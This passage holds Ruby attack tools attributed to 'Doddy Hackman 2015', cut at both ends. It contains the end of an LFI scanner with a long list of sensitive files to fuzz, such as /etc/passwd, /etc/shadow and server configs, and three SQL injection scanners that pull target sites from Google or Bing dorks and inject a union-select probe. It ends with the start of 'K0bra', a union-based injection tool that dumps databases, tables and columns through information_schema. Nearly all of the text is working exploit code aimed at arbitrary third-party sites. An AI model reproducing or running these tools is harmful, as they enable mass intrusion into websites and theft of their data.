ogs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
console.insert("end", "[+] Testing the vulnerability LFI...\n\n")
code = toma(web+"'")
if code=~/No such file or directory in <b>(.*)<\/b> on line/
fpd = $1
console.insert("end","[+] LFI Detected\n\n")
console.insert("end","[Full Path Discloure]: "+fpd+"\n")
console.insert("end","\n[+] Fuzzing Files\n\n")
files.each do |file|
code = toma(web+file)
if not code=~/No such file or directory in/
console.insert("end","[Link] : "+web+file+"\n")
end
end
console.insert("end","\n[+] Finish")
else
console.insert("end","[-] Not Vulnerable to LFI")
end
}
place('relx'=>0.3,'rely'=>0.9)
end
Tk.mainloop
#The End ?
#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
require "open-uri"
require "net/http"
require "openssl"
# Functions
def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end
def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end
def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end
def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
if page=~/(.*)=(.*)/
parte1 = $1
parte2 = $2
final = parte1 + "="
finales.push(final)
end
end
return finales
end
def google(dork,pages)
links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
paginas.flatten.each do |pagina|
partes = pagina
if partes=~/url\?q=(.*)&sa/
parte = $1
link = URI::decode(parte)
links.push(link)
end
end
end
links = links.uniq
return links
end
def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
contador+=10
url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
code = toma_ssl(url)
links = URI::extract(code)
links.each do |link|
if link=~/cache:(.*?):(.*?)\+/
link_final = "http://"+$2
link_final = URI::decode(link_final)
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end
def bing(dork,pages)
guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
links = code.scan(/<h2><a href="(.*?)" h/)
links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
links = code.scan(/<h3><a href="(.*?)" h/)
links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end
def uso
print "\n[+] Sintax : ruby scanner.rb <options> <dork> <pages>\n\n"
print "-search_bing : Find in Bing\n"
print "-search_google : Find in Google\n"
print "-scan_bing : Find SQLI in Bing\n"
print "-scan_google : Find SQLI in Google\n"
print "\n[+] Example of use : ruby scanner.rb -scan_bing news.php+id 3\n"
end
def head
print "\n\n-- == SQLI Scanner 0.4 == --\n\n"
end
def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end
opcion = ARGV[0]
dork = ARGV[1]
pages = ARGV[2]
head()
if !opcion or !dork or !pages
uso()
else
if opcion=="-search_bing"
print "\n[+] Searching in Bing ...\n\n"
links = bing(dork,pages)
print "[+] Pages Count : "+links.count.to_s+"\n\n"
if links.count.to_s=="0"
print "[-] Links not found\n"
end
links.flatten.each do |link|
print "[+] Link : "+link+"\n"
end
print "\n[+] Finished\n"
elsif opcion=="-search_google"
print "\n[+] Searching in Google ...\n\n"
links = google(dork,pages)
if links.count.to_s=="0"
print "[+] Searching in Google again ...\n\n"
links = google_recursive(dork,pages)
end
print "[+] Pages Count : "+links.count.to_s
if links.count.to_s=="0"
print "[-] Links not found"
end
links.flatten.each do |link|
print "[+] Link : "+link+"\n"
end
print "\n[+] Finished\n"
elsif opcion=="-scan_bing"
print "\n[+] Searching in Bing ...\n\n"
links = cortar(bing(dork,pages))
print "[+] Pages Count : "+links.count.to_s+"\n\n"
if links.count.to_s=="0"
print "[-] Links not found\n"
end
links.flatten.each do |link|
print "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
print " [OK]\n\a\a"
else
print " [FAIL]\n"
end
rescue
print " [FAIL]\n"
end
end
print "\n[+] Finished\n"
elsif opcion=="-scan_google"
print "\n[+] Searching in Google ...\n\n"
links = cortar(google(dork,pages))
if links.count.to_s=="0"
print "[+] Searching in Google again ...\n\n"
links = cortar(google_recursive(dork,pages))
end
print "[+] Pages Count : "+links.count.to_s+"\n\n"
if links.count.to_s=="0"
print "[-] Links not found"
end
links.flatten.each do |link|
print "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
print " [OK]\n\a\a"
else
print " [FAIL]\n"
end
rescue
print " [FAIL]\n"
end
end
print "\n[+] Finished\n"
else
print "[-] Bad Option"
end
end
copyright()
#The End ?
#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Google Tk
require "tk"
require "open-uri"
require "net/http"
require "openssl"
# Functions
def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end
def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end
def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end
def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
if page=~/(.*)=(.*)/
parte1 = $1
parte2 = $2
final = parte1 + "="
finales.push(final)
end
end
return finales
end
def google(dork,pages)
links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
paginas.flatten.each do |pagina|
partes = pagina
if partes=~/url\?q=(.*)&sa/
parte = $1
link = URI::decode(parte)
links.push(link)
end
end
end
links = links.uniq
return links
end
def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
contador+=10
url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
code = toma_ssl(url)
links = URI::extract(code)
links.each do |link|
if link=~/cache:(.*?):(.*?)\+/
link_final = "http://"+$2
link_final = URI::decode(link_final)
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end
def bing(dork,pages)
guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
links = code.scan(/<h2><a href="(.*?)" h/)
links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
links = code.scan(/<h3><a href="(.*?)" h/)
links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end
#
window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Google" ; background "black" }
window['geometry'] = '300x320-20+10'
TkLabel.new(window) do
background "black"
foreground "green"
text " Dork : "
place('relx'=>"0.1",'rely'=>"0.1")
end
dork = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.1)
}
TkLabel.new(window) do
background "black"
foreground "green"
text " Pages : "
place('relx'=>"0.1",'rely'=>"0.2")
end
pages = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.2)
}
TkLabel.new(window) do
background "black"
foreground "green"
text "Console"
place('relx'=>0.4,'rely'=>0.3)
end
console =TkText.new(window) do
background "black"
foreground "green"
width 30
height 9
place('relx'=>0.1,'rely'=>0.4)
end
TkButton.new(window) do
text "Search"
background "black"
foreground "green"
width 17
activebackground "green"
highlightbackground "green"
command proc{
dork = dork.value.to_s
pages = pages.value.to_s
console.insert("end", "[+] Searching in Google ...\n\n")
links = cortar(google(dork,pages))
if links.count.to_s=="0"
console.insert("end", "[+] Searching in Google again ...\n\n")
links = cortar(google_recursive(dork,pages))
end
console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")
if links.count.to_s=="0"
console.insert("end", "[-] Links not found")
end
links.flatten.each do |link|
console.insert("end", "[+] Link : "+link)
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
console.insert("end"," [OK]\n\a\a")
else
console.insert("end"," [FAIL]\n")
end
rescue
console.insert("end", " [FAIL]\n")
end
end
console.insert("end", "\n[+] Finished")
}
place('relx'=>0.3,'rely'=>0.9)
end
Tk.mainloop
#The End ?
#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Bing Tk
require "tk"
require "open-uri"
require "net/http"
require "openssl"
# Functions
def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end
def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end
def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end
def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
if page=~/(.*)=(.*)/
parte1 = $1
parte2 = $2
final = parte1 + "="
finales.push(final)
end
end
return finales
end
def google(dork,pages)
links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
paginas.flatten.each do |pagina|
partes = pagina
if partes=~/url\?q=(.*)&sa/
parte = $1
link = URI::decode(parte)
links.push(link)
end
end
end
links = links.uniq
return links
end
def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
contador+=10
url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
code = toma_ssl(url)
links = URI::extract(code)
links.each do |link|
if link=~/cache:(.*?):(.*?)\+/
link_final = "http://"+$2
link_final = URI::decode(link_final)
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end
def bing(dork,pages)
guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
links = code.scan(/<h2><a href="(.*?)" h/)
links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
links = code.scan(/<h3><a href="(.*?)" h/)
links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end
#
window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Bing" ; background "black" }
window['geometry'] = '300x320-20+10'
TkLabel.new(window) do
background "black"
foreground "green"
text " Dork : "
place('relx'=>"0.1",'rely'=>"0.1")
end
dork = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.1)
}
TkLabel.new(window) do
background "black"
foreground "green"
text " Pages : "
place('relx'=>"0.1",'rely'=>"0.2")
end
pages = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.2)
}
TkLabel.new(window) do
background "black"
foreground "green"
text "Console"
place('relx'=>0.4,'rely'=>0.3)
end
console =TkText.new(window) do
background "black"
foreground "green"
width 30
height 9
place('relx'=>0.1,'rely'=>0.4)
end
TkButton.new(window) do
text "Search"
background "black"
foreground "green"
width 17
activebackground "green"
highlightbackground "green"
command proc{
dork = dork.value.to_s
pages = pages.value.to_s
console.insert("end", "[+] Searching in Bing ...\n\n")
links = cortar(bing(dork,pages))
console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")
if links.count.to_s=="0"
console.insert("end","[-] Links not found\n")
end
links.flatten.each do |link|
console.insert("end", "[+] Link : "+link)
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
console.insert("end"," [OK]\n\a\a")
else
console.insert("end", " [FAIL]\n")
end
rescue
console.insert("end"," [FAIL]\n")
end
end
console.insert("end", "\n[+] Finished")
}
place('relx'=>0.3,'rely'=>0.9)
end
Tk.mainloop
#The End ?
#!usr/bin/ruby
#K0bra 0.5
#(C) Doddy Hackman 2015
require "net/http"
require "open-uri"
$files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']
def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end
def decode_hex(text)
text = text.sub("0x","")
return [text].pack('H*')[0]
end
def encode_hex(text)
return "0x"+text.unpack('H*')[0]
end
def copyright()
print "\n-- == (C) Doddy Hackman 2015 == --\n"
gets.chomp
exit(1)
end
def installer()
dir = Dir::pwd+"/"+"logs_webs"
if not FileTest::directory?(dir)
Dir::mkdir(dir)
end
end
def savefile(file,text)
url = URI.parse(file)
save = File.open("logs_webs/"+url.host+".txt","a")
save.puts text+"\n"
save.close
end
def bypass(op)
if op=="--"
return "+","--"
elsif op=="/*"
return "/**/","/**/"
elsif op=="%20"
return "%20","%00"
else
return "+","--"
end
end
def head()
clean()
print "
@ @@ @
@@ @ @ @@
@ @@ @ @ @ @ @ @ @@@
@ @ @ @ @@ @ @@@ @ @
@@ @ @ @ @ @ @@@
@ @ @ @ @ @ @ @ @
@@@ @ @@ @@@ @@@ @@@@@
"
end
def volverinicio()
print "\n\n[+] Press any key to continue\n\n"
gets.chomp
inicio()
end
def clean()
if RUBY_PLATFORM=~/win/ or RUBY_PLATFORM=~/min/
system("cls")
else
system("clear")
end
end
def retorno(url,by)
print "\n[+] Finished"
print "\n\n[+] Press any key to continue\n\n"
gets.chomp
central(url,by)
end
def gettables(url,by)
pass1,pass2 = bypass(by)
web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
print "\n[+] Getting tables ...\n\n"
code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
if code1=~/K0BRA(.*?)K0BRA/
total = $1
print "[+] Tables Found : ",total,"\n\n"
savefile(url,"\n[+] Tables Found : #{total}\n")
for num in ("17"..total)
code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
if code2=~/K0BRA(.*?)K0BRA/
table = $1
print "[+] Table Found : "+table+"\n"
savefile(url,"[+] Table Found : #{table}")
end
end
else
print "[-] Not Found\n"
end
end
def getcolumns(url,by,tablex)
tablexa = encode_hex(tablex)
pass1,pass2 = bypass(by)
web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
print "\n[+] Getting columns ...\n\n"
code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
if code1=~/K0BRA(.*?)K0BRA/
total = $1
print "[+] Columns Found : ",total,"\n\n"
savefile(url,"\n[+] Table : #{tablex}")
savefile(url,"[+] Columns Found : #{total}\n")
for num in ("0"..total)
code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
if code2=~/K0BRA(.*?)K0BRA/
table = $1
print "[+] Column Found : "+table+"\n"
savefile(url,"[+] Column Found : #{table}")
end
end
else
print "[-] Not Found\n"
end
end
def getdbs(url,by)
pass1,pass2 = bypass(by)
web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
print "\n[+] Getting DBS ...\n\n"
code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
if code1=~/K0BRA(.*?)K0BRA/
total = $1
print "[+] DBS Found : ",total,"\n\n"
savefile(url,"\n[+] DBS Found : #{total}\n")
for num in ("0"..total)
code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
if code2=~/K0BRA(.*?)K0BRA/
table = $1
print "[+] DB Found : "+table+"\n"
savefile(url,"[+] DB Found : #{table}")
end
end
else
print "[-] Not Found\n"
end
end
def gettablesbydb(url,by,dbx)
data = encode_hex(dbx)
pass1,pass2 = bypass(by)
web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
print "\n[+] Getting tables ...\n\n"
code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
if code1=~/K0BRA(.*?)K0BRA/
total = $1
print "[+] Tables Found : ",total,"\n\n"
savefile(url,"\n[+] DBS : #{dbx}")
savefile(url,"[+] Tables Found : #{total}\n")
for num in ("0"..total)
code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
if code2=~/K0BRA(.*?)K0BRA/
table = $1
print "[+] Table Found : "+table+"\n"
savefile(url,"[+] Table Found : #{table}")
end
end
else
print "[-] Not Found\n"
end
end
def getcolumnsbydb(url,by,db,tab)
data = encode_hex(db)
tabx = encode_hex(tab)
pass1,pass2 = bypass(by)
web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
print "\n[+] Getting columns ...\n\n"
code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
if code1=~/K0BRA(.*?)K0BRA/
total = $1
print "[+] Columns Found : ",total,"\n\n"
savefile(url,"\n[+] DB : #{db}")
savefile(url,"[+] Table : #{tab}")
savefile(url,"[+] Columns Found : #{total}\n")
for num in ("0"..total)
code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
if code2=~/K0BRA(.*?)K0BRA/
table = $1
print "[+] Column Found : "+table+"\n"
savefile(url,"[+] Column Found : #{table}")
end
end
else
print "[-] Not Found\n"
